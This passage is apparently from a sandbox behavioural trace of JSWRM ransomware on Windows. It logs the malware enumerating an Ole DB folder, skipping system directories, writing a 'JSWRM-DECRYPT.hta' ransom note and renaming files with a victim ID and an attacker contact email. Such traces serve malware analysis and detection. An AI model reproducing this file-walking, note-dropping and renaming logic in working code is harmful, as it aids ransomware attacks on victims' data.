(HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0069.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\jswrm-decrypt.hta")) returned 0x20 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.306] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ff961e1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0069.307] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.307] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ff961e1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="..", cAlternateFileName="")) returned 1 [0069.307] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.307] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.307] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d8245b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0069.307] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0069.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0069.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0069.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.310] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.310] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.311] CloseHandle (hObject=0x454) returned 1 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0069.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.312] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d8245b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ffa4dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName=".", cAlternateFileName="")) returned 0x232080 [0069.312] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.312] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d8245b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ffa4dcb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="..", cAlternateFileName="")) returned 1 [0069.312] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.312] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.312] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ffa0020, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ffa0020, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ffa88a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.313] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0069.313] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2=".") returned 1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="..") returned 1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="...") returned 1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="windows") returned -1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="recovery") returned -1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="perflogs") returned -1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="documents and settings") returned 1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="system volume information") returned -1 [0069.314] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="msocache") returned -1 [0069.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll.mui", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasqlr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll.mui", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasqlr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.315] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0069.315] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.315] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.315] CloseHandle (hObject=0xffffffff) returned 1 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0069.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.316] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.317] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9e0d51, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x60002, dwReserved1=0x234e58, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2=".") returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="..") returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="...") returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="windows") returned -1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="recovery") returned -1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="perflogs") returned -1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="documents and settings") returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="system volume information") returned -1 [0069.317] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="msocache") returned 1 [0069.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll.mui", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32r.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll.mui", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32r.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.318] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: 